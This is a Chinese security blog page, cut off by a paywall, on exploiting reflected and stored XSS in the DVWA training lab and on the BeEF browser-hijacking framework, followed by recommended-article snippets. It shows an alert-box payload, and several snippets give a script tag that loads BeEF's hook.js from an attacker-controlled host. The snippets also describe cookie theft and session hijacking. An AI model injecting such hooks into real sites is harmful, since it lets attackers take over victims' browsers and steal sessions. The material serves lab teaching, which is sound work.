xss漏洞以及beef的使用

最新推荐文章于 2025-01-06 21:04:36 发布

原创

最新推荐文章于 2025-01-06 21:04:36 发布 · 3.1k 阅读

17 ·

CC 4.0 BY-SA版权

本文通过DVWA实例详细介绍了反射型和存储型XSS漏洞，包括不同级别的payload构造和绕过方法。同时，讲解了如何使用BeEF框架进行XSS攻击，强调了Burpsuite在漏洞检测中的作用，并给出了修复XSS漏洞的建议。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

这次的xss漏洞就从dvwa开始吧。
反射型：
先是low级别的，输入1后页面变为
在这里插入图片描述这次尝试一下burpsuite里自带的扫描器。

首先不得不说dvwa设计有一些缺陷，有时候等级改不过去，这就让人很蛋疼，所以还是要自己手动改一下。就因为这个，扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图

在这里插入图片描述可以看到箭头指向的就是payload
看一下返回页面，就是弹框1了。没啥别的。
抓一下返回包看一看

在这里插入图片描述可以看到我们输进去的东西被解析了。

成功的构造弹窗是xss的一个里程碑

总结一下，low级别的payload的为：<script>alert(1)</script>

medium级别：
还尝试low级别的payload，但是输入之后结果是这样的。
在这里插入图片描述看一下源码

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name =

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

YouNgFreshq

关注关注

2
点赞
踩
17

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Web安全 XSS漏洞的利用（Beef工具）（点击链接就被黑的技术.）

网络安全领域___专研者.

03-18

4549

XSS漏洞的概括： XSS又叫CSS（Cross Site Script）跨站脚本攻击，指的是攻击者在Web页面，插入恶意JS代码，当用户浏览该页之时，嵌入其中JS代码就会被执行，从而达到攻击的目的.（包含：收集用户的Cookie，添加账号，修改密码，提高用户权限等等.）

BeEF-XSS攻击

彭淦淦的博客

05-11

1104

6.1 问题 Kali虚拟机（192.168.111.132）搭建BeEF服务宿主机（192.168.111.1）搭建正常网站 Win2008虚拟机（192.168.111.133）模拟用户被攻击 6.2 步骤实现此案例需要按照如下步骤进行。 1）Kali虚拟机安装BeEF，依次运行命令apt-get update，apt-get install beef-xss，安装完成后启动beef-xss，用户名beef，自定义密码例如123456，如图-11和图-12所示图-11 图-1

参与评论您还未登录，请先登录后发表或查看评论

web安全渗透——4（XSS攻击+BeEF）

weixin_44826485的博客

02-06

841

一、简介介绍： XSS全称是Cross Site Scripting即跨站脚本，当目标网站目标用户浏览器渲染HTML文档的过程中，出现了不被预期的脚本指令并执行时，XSS就发生了。关于XSS有关危害，我这里中罗列一段列表，详细介绍不进行更多的赘述：挂马盗取用户Cookie。 DOS（拒绝服务）客户端浏览器。钓鱼攻击，高级的钓鱼技巧。删除目标文章、恶意篡改数据、嫁祸。劫持用户Web行为，甚至进一步渗透内网。爆发Web2.0蠕虫。蠕虫式的DDoS攻击。蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数

XSS漏洞利用工具BeEF

RockHan

11-06

1047

BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击，BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同，BeEF超越了硬化的网络边界和客户端系统，并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器，并将其用作启动定向命令模块的滩头堡，...

BeEF利用XSS漏洞

洞若观火

10-06

2577

XSS跨站脚本攻击，检测与利用方法 poe：<script>alert('XSS')</script> exp：<script src="http://<beef服务端ip>:3000/hook.js"></script>//攻击者ip kali下： find / -name beef-xss ...

Beef-xss漏洞利用

m0_49894436的博客

01-06

621

XSS（Cross-Site Scripting，跨站脚本攻击）是一种常见的网络安全漏洞，它允许攻击者在用户的浏览器上执行恶意脚本。这种攻击通常发生在攻击者将恶意脚本注入到一个信任的网站中，而该网站的内容会被其他用户浏览。• DOM型XSS：攻击者的脚本通过修改DOM（文档对象模型）来执行，不经过服务器，而是在客户端直接操作DOM。.• 反射型XSS：攻击者的脚本通过用户输入直接反射到页面上，通常发生在表单提交或者URL参数中。

XSS漏洞

2401_83181186的博客

04-25

1232

XSS漏洞介绍以及beef，waf简介

【XSS漏洞-06】XSS漏洞利用案例（浏览器劫持、会话劫持、GetShell）—基于神器beEF

m0_64378913的博客

06-02

4942

（1）了解beEF工具的使用；（2）加深理解XSS漏洞的利用和危害；（3）掌握浏览器劫持的攻击方法；（4）掌握会话劫持的攻击方法；（5）掌握通过XSS漏洞GetShell的方法。

利用BeEF执行XSS攻击

m0_70185580的博客

05-31

780

XSS攻击（Cross-Site Scripting）是指攻击者在网页中注入恶意脚本代码，使受害者在浏览器中运行该脚本，从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具，可以在浏览器端运行恶意脚本。当攻击成功后，可以在BeEF的控制面板中查看受害者的浏览器信息，并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中，并启动BeEF的hook服务。接下来，需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时，BeEF就会启动并开始执行攻击。

XSS漏洞概述及使用

一颗小松子.的博客

01-23

1695

XSS 漏洞概述简介 XSS作为OWASP TOP 10 之一 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名，所以更名为XSS。XSS(跨站脚本攻击) 主要基于javascript (JS) 完成恶意的攻击行为。 JS可以非常灵活的操作html，css和浏览器，这使得XSS攻击的"想象"空间特别大。 XSS通过将精心构造的代码(JS)代码注入到网页中，并由浏览器解释运

XSS攻击：利用Beef劫持被攻击者客户端浏览器

zzzfff__的博客

11-13

1478

实验环境搭建。角色：留言簿网站。存在XSS漏洞；（IIS或Apache、guestbook搭建）攻击者：Kali（使用beEF生成恶意代码，并通过留言方式提交到留言簿网站）；被攻击者：访问留言簿网站，浏览器被劫持。

渗透利器-kali工具 (第三章-6) Xss漏洞学习之-Beef-Xss

ztc131450的博客

12-05

696

xss跨站脚本攻击，是java script代码插入web页面中，之后当用户浏览页面，会执行嵌套在Wen页面里面的java script代码，从而达到攻击机用户的目的，如果kali中未存在，beef-xss，可以使用此命令下载：git clone https://github.com/beefproject/beef.git。beef：beef：一款浏览器攻击框架，用Runy语言开发的，kali中默认安装的一个模块，用户实现对xss漏洞的攻击和利用。前端会轮询后端是否有新的数据需要更新，

中间人攻击arp欺骗及与beef-xss联动

m0_52361291的博客

06-22

1773

中间人攻击（Man-in-the-Middle Attack, MITM）是一种由来已久的网络入侵手段，并且当今仍然有着广泛的发展空间，如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之，所谓的MITM攻击就是通过拦截正常的网络通信数据，并进行数据篡改和嗅探，而通信的双方却毫不知情。地址解析协议，即ARP（Address Resolution Protocol），是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机，并接收返

存储型XSS和BEEF浏览器攻击框架

分享学习网络的点点滴滴

08-24

454

里面有很多，比如获取cookie，获取超链接啊，修改超链接啊，开启摄像头啊，攻击啊，dos，交换机路由器漏洞利用啊等等，自己使用dvwa用kali试试吧；方法还是跟反射型方法一样，只不过对于存储XSS是存入数据库的，只要打开页面就会执行。客户端：运行于客户端浏览器的Javascript脚本（hook）红色模块：表示模块不适用于当前用户，有些红色模块也可被正常执行。绿色模块：表示模块适合目标浏览器，并且执行结果被客户端不可见。橙色模块：模块可用，但结果对用户可见（CAM弹窗申请权限等）

XSS部分：利用Beef劫持被攻击者客户端浏览器

AZXYZNPY的博客

11-21

279

原理：此类XSS漏洞是指，用户输入的数据（恶意代码）可以“存储”在服务端，只要有人访问这个包含有存储型XSS代码的页面，XSS脚本就会在他们的浏览器中执行，这种XSS具有很强的稳定性。，截图。3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板，攻击者：Kali（使用beEF生成恶意代码，并通过留言方式提交到留言簿网站）；被攻击者：访问留言簿网站，浏览器被劫持。

利用Beef进行XSS会话劫持

Deeeelete的博客

02-09

1661

1.登入靶机中的DVWA环境，安全等级调到最低，进入xss环境界面2.打开自带的beef软件第一次使用会提示你修改密码vim /etc/beef-xss/config.yaml打开修改，将密码修改成其他任意的内容就可以重新打开软件了。保存退出然后重新打开软件就可以正常进入了登录密码就是我们刚才修改的，输入然后登录3.回到终端，因为beef打开会默认开一个终端和一个浏览器界面，我们找到beff为我们...

【XSS漏洞07】基于神器beEF的XSS漏洞利用实验（浏览器劫持、会话劫持、GetShell）

Fighting_hawk的博客

02-26

5466

1. 加深理解XSS漏洞的利用和危害； 2. 了解beEF工具的使用； 3. 掌握浏览器劫持的攻击方法； 4. 掌握会话劫持的攻击方法； 5. 掌握通过XSS漏洞GetShell的方法。

【beef-xss】

一纸荒芜的博客

09-07

1438

xss漏洞可以拿来做什么呢?只是弹窗吗？不，我们的目的是盗取用户cookie,配合工具还可查看文件管理,本期主要介绍了beef-xss的简单用法。

2021Kali系列 -- XSS漏洞（Beef-xss）

Web安全工具库

04-14

2050

当我不欠任何人的时候，我就只欠我自己了。。。 ----网易云热评一、安装beef-xss 输入beef-xss，提示安装，输入y 二、启动beef-xss 三、访问登陆页面： http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.

beef-xss详细使用教程